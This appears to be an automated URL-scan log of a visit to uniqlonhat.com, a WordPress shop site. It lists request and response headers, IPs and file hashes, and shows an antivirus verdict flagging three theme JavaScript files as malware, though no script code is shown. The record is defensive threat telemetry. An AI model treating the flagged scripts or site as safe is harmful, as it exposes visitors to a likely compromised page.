User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Retry-After: 0
Location: https://i.imgur.com/v8TniL3.png
Accept-Ranges: bytes
Date: Sat, 03 Dec 2022 15:04:30 GMT
X-Served-By: cache-bma1653-BMA
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1670079870.344233,VS0,VE0
Strict-Transport-Security: max-age=300
Access-Control-Allow-Methods: GET, OPTIONS
Access-Control-Allow-Origin: *
Server: cat factory 1.0
uniqlonhat.com/wp-includes/js/comment-reply.min.js?ver=5.6.10
103.28.36.212200 OK 1.4 kB URL HTTP/1.1 uniqlonhat.com/wp-includes/js/comment-reply.min.js?ver=5.6.10
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (2949)
Hash f87965da117ce1309aa0b19d57ebdb2a
d4f353be3e4c59567dee4cab7a73a95537ab2fe8
75d3a08180d940cd8cd101156e878d72289b2ab83b0b8f6a9b39f610c39f7df3
GET /wp-includes/js/comment-reply.min.js?ver=5.6.10 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Thu, 15 Apr 2021 09:34:23 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 1381
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4
103.28.36.212200 OK 2.4 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type Unicode text, UTF-8 text, with very long lines (3199)
Hash b952eadb16e6be47afbac7ceb2ae37c6
fc37684aeee17eb7aa6b78c6dd8e0856bc3b279a
1b4bb39d2791d069e94b6f667d172d8495998dafa2859711709237ba628dceba
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/eStore/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Thu, 26 Mar 2020 03:49:41 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 2351
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4
103.28.36.212200 OK 6.0 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type ASCII text, with very long lines (15532)
Hash d3b610860fa7670d5de2ea4252074122
5c93824e7d11edddd1b6a470671f5ec1481a8ca2
633ea72ea02cc3e5e9abb9e6f95c6ff54d9757db6d3232cfc6148239bbfc4931
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/eStore/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Thu, 26 Mar 2020 03:49:42 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 6033
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1
103.28.36.212200 OK 2.1 kB URL HTTP/1.1 uniqlonhat.com/wp-content/themes/eStore/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
Hash e1ade10f3bd0740872a4585cf20380b7
f5a7dddef0615cdc630fa90481cff84e96948cca
dc501cb1e8718c0149df211647456be83dce861dfaeb15c5a6d2163cfdcf3eae
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/eStore/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:27 GMT
Content-Type: application/javascript
Last-Modified: Thu, 26 Mar 2020 03:49:41 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 2100
Date: Sat, 03 Dec 2022 15:04:27 GMT
Server: LiteSpeed
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 98fe7e5fd6b778bcdcc63028c3a49fbd
06b34160c344526fbe14ce41445b9fe76c0a878d
d45d898dfe5bf1151557bbbc3be6e6878fbadce386136d60777b4464199173a6
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:30 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
i.imgur.com/v8TniL3.png
151.101.84.193200 OK 2.8 kB IP 151.101.84.193:0
File type PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced\012- data
Hash 4dd8a1adce2e600f1102391c34a0dbac
a148737ab4ee3cfc830a4cc57a71ad3aac5eda89
d33e3b60894e808e93338eab672097fa142110ecdb9245628457b703da41dae4
GET /v8TniL3.png HTTP/1.1
Host: i.imgur.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://uniqlonhat.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
last-modified: Tue, 06 Sep 2016 09:27:17 GMT
etag: "4dd8a1adce2e600f1102391c34a0dbac"
content-type: image/png
cache-control: public, max-age=31536000
accept-ranges: bytes
date: Sat, 03 Dec 2022 15:04:30 GMT
age: 3104535
x-served-by: cache-iad-kiad7000082-IAD, cache-bma1629-BMA
x-cache: HIT, HIT
x-cache-hits: 16642, 1
x-timer: S1670079870.424659,VS0,VE1
strict-transport-security: max-age=300
access-control-allow-methods: GET, OPTIONS
access-control-allow-origin: *
server: cat factory 1.0
x-content-type-options: nosniff
content-length: 2847
X-Firefox-Spdy: h2
translate.googleapis.com/translate_static/css/translateelement.css
142.250.74.74200 OK 3.6 kB URL HTTP/2 translate.googleapis.com/translate_static/css/translateelement.css
IP 142.250.74.74:0
File type ASCII text, with very long lines (18670)
Hash 897ba9a21d9625286674da769dacc2e2
84b4923ab7dee562395160824d53496314499b77
696cbf5c2f3f1efae555562b72abbbb22bed02eff03d62074555cab241190ae0
GET /translate_static/css/translateelement.css HTTP/1.1
Host: translate.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/rosetta
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="rosetta"
report-to: {"group":"rosetta","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/rosetta"}]}
content-length: 3619
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sat, 03 Dec 2022 14:51:24 GMT
expires: Sat, 03 Dec 2022 15:51:24 GMT
cache-control: public, max-age=3600
age: 786
last-modified: Wed, 17 Aug 2022 23:38:00 GMT
content-type: text/css
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoCxCvjvmyNL4U.woff2
216.58.207.227200 OK 38 kB URL HTTP/1.1 fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoCxCvjvmyNL4U.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 37840, version 1.0\012- data
Hash 6957af42676a9a6104e7a8eee1cee92f
05a81c1de245f5abfda3e26e333753a98a90b77f
e4f50b8bf27fec2b2be5907a06a6579a355aa86542322a2434fac71a22c2ea6e
GET /s/ubuntu/v20/4iCv6KVjbNBYlgoCxCvjvmyNL4U.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 37840
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 01 Dec 2022 16:36:57 GMT
Expires: Fri, 01 Dec 2023 16:36:57 GMT
Cache-Control: public, max-age=31536000
Age: 167253
Last-Modified: Wed, 27 Apr 2022 17:05:12 GMT
Content-Type: font/woff2
fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoCxCvjsGyN.woff2
216.58.207.227200 OK 30 kB URL HTTP/1.1 fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoCxCvjsGyN.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 29752, version 1.0\012- data
Hash ab1fc8621287e4ea9319a3136812cf80
fb4ed2e52e2a8d7ac50a7618a0c2ea5507a24ef3
7c00752ce82d6abaed0b9766d35b906b16675facdbe24115b410d1fab975effa
GET /s/ubuntu/v20/4iCv6KVjbNBYlgoCxCvjsGyN.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 29752
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 29 Nov 2022 16:31:04 GMT
Expires: Wed, 29 Nov 2023 16:31:04 GMT
Cache-Control: public, max-age=31536000
Age: 340406
Last-Modified: Wed, 27 Apr 2022 17:05:11 GMT
Content-Type: font/woff2
fonts.gstatic.com/s/ubuntu/v20/4iCu6KVjbNBYlgoKej76l0mwFg.woff2
216.58.207.227200 OK 50 kB URL HTTP/1.1 fonts.gstatic.com/s/ubuntu/v20/4iCu6KVjbNBYlgoKej76l0mwFg.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 49736, version 1.0\012- data
Hash 6caf49f829d074642e9ac64b1ab2d3a8
10946868ccc5392cfeec80ac31f6c73cb1567b4a
6c325a13c46d6316e828b781145a86b9ad2cc06ffc7b054c611d27ffb5e1761e
GET /s/ubuntu/v20/4iCu6KVjbNBYlgoKej76l0mwFg.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 49736
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Wed, 30 Nov 2022 17:01:14 GMT
Expires: Thu, 30 Nov 2023 17:01:14 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Wed, 27 Apr 2022 16:12:18 GMT
Content-Type: font/woff2
Age: 252196
fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKcQ72j00.woff2
216.58.207.227200 OK 47 kB URL HTTP/1.1 fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKcQ72j00.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 46796, version 1.0\012- data
Hash 328da9d0efdf3626073910bfd379b2ff
e55f0b86555b18495045db12654779186c94f0a5
d9086c8c2ed7c9f988d63847cd89e81318c1e4ade2112969af26e5744a3bc7d7
GET /s/ubuntu/v20/4iCs6KVjbNBYlgoKcQ72j00.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 46796
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 01 Dec 2022 22:09:10 GMT
Expires: Fri, 01 Dec 2023 22:09:10 GMT
Cache-Control: public, max-age=31536000
Age: 147320
Last-Modified: Wed, 27 Apr 2022 16:31:24 GMT
Content-Type: font/woff2
fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKfw72.woff2
216.58.207.227200 OK 35 kB URL HTTP/1.1 fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKfw72.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 34852, version 1.0\012- data
Hash 0e8eefb4549a2edf26c560cb9845952e
8d0b1718aacad934fd0043c87cbc54aa091396bf
7f653b3ce9d3277457fc6da4edb246ae2f6c913f088c42dcb8cd2e96267aa21a
GET /s/ubuntu/v20/4iCs6KVjbNBYlgoKfw72.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 34852
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 01 Dec 2022 02:07:55 GMT
Expires: Fri, 01 Dec 2023 02:07:55 GMT
Cache-Control: public, max-age=31536000
Age: 219395
Last-Modified: Wed, 27 Apr 2022 16:31:23 GMT
Content-Type: font/woff2
fonts.gstatic.com/s/ubuntu/v20/4iCu6KVjbNBYlgoKej70l0k.woff2
216.58.207.227200 OK 37 kB URL HTTP/1.1 fonts.gstatic.com/s/ubuntu/v20/4iCu6KVjbNBYlgoKej70l0k.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 36564, version 1.0\012- data
Hash 3dc4c11f72b9457d49b56d162fb71a19
284248aec91153ee4e89fa3fc51e62f782c4260b
af186659e415490e7eee1bd3c8d511771dbd3e03ddbebf6b6a5096ac8ba29449
GET /s/ubuntu/v20/4iCu6KVjbNBYlgoKej70l0k.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 36564
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 01 Dec 2022 06:42:57 GMT
Expires: Fri, 01 Dec 2023 06:42:57 GMT
Cache-Control: public, max-age=31536000
Age: 202893
Last-Modified: Wed, 27 Apr 2022 16:13:13 GMT
Content-Type: font/woff2
fonts.gstatic.com/s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYe8UMLLq7s.woff2
216.58.207.227200 OK 20 kB URL HTTP/1.1 fonts.gstatic.com/s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYe8UMLLq7s.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 19676, version 1.0\012- data
Hash 4d104d1bc2566c6b5a708cfe45f2e9dd
37ebc4b10ab6c64010c29b6fa2407502d1d8f292
d3d3cca6f4b2a4055932a63bad8735b7d92fb1d00f0269fbad47ddcb9508b3ca
GET /s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYe8UMLLq7s.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 19676
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 28 Nov 2022 15:33:07 GMT
Expires: Tue, 28 Nov 2023 15:33:07 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Mon, 09 May 2022 18:39:58 GMT
Content-Type: font/woff2
Age: 430283
fonts.gstatic.com/s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYe8XsLL.woff2
216.58.207.227200 OK 24 kB URL HTTP/1.1 fonts.gstatic.com/s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYe8XsLL.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 23756, version 1.0\012- data
Hash 71687099161ec916d7ff956567427281
a90180de8fd3ff4ec1e6b6d58d6deeee07d127fd
25fbbdd2754f220fea375d972e4b924831197575728e277278e0c6b8dd46ca2a
GET /s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYe8XsLL.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 23756
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 29 Nov 2022 17:29:23 GMT
Expires: Wed, 29 Nov 2023 17:29:23 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Mon, 09 May 2022 18:38:25 GMT
Content-Type: font/woff2
Age: 336907
fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKew72j00.woff2
216.58.207.227200 OK 21 kB URL HTTP/1.1 fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKew72j00.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 20860, version 1.0\012- data
Hash 15b0d42b9ec6606a60edbdcced868466
73ca3f9f966f6722e78409b22db328ce4da475a9
f1400c92345dcd9dbf746acab2c60e8580aa959473e9e56c8772cadcf7734b76
GET /s/ubuntu/v20/4iCs6KVjbNBYlgoKew72j00.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 20860
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 29 Nov 2022 19:09:34 GMT
Expires: Wed, 29 Nov 2023 19:09:34 GMT
Cache-Control: public, max-age=31536000
Age: 330896
Last-Modified: Wed, 27 Apr 2022 16:15:59 GMT
Content-Type: font/woff2
fonts.gstatic.com/s/ubuntu/v20/4iCp6KVjbNBYlgoKejZPslyPN4E.woff2
216.58.207.227200 OK 31 kB URL HTTP/1.1 fonts.gstatic.com/s/ubuntu/v20/4iCp6KVjbNBYlgoKejZPslyPN4E.woff2
IP 216.58.207.227:0
File type Web Open Font Format (Version 2), TrueType, length 30660, version 1.0\012- data
Hash cdcb36470498e7242993f5e7e97d6ed9
25104a88441b010d8d1dd998b455ccc4003848d7
26918e4295cab1eaecebc5d4719c212691f040bfe31daf0c7caf08f7a0de520a
GET /s/ubuntu/v20/4iCp6KVjbNBYlgoKejZPslyPN4E.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://fonts.googleapis.com/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 30660
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 02 Dec 2022 17:20:22 GMT
Expires: Sat, 02 Dec 2023 17:20:22 GMT
Cache-Control: public, max-age=31536000
Age: 78248
Last-Modified: Wed, 27 Apr 2022 16:08:03 GMT
Content-Type: font/woff2
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 98fe7e5fd6b778bcdcc63028c3a49fbd
06b34160c344526fbe14ce41445b9fe76c0a878d
d45d898dfe5bf1151557bbbc3be6e6878fbadce386136d60777b4464199173a6
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
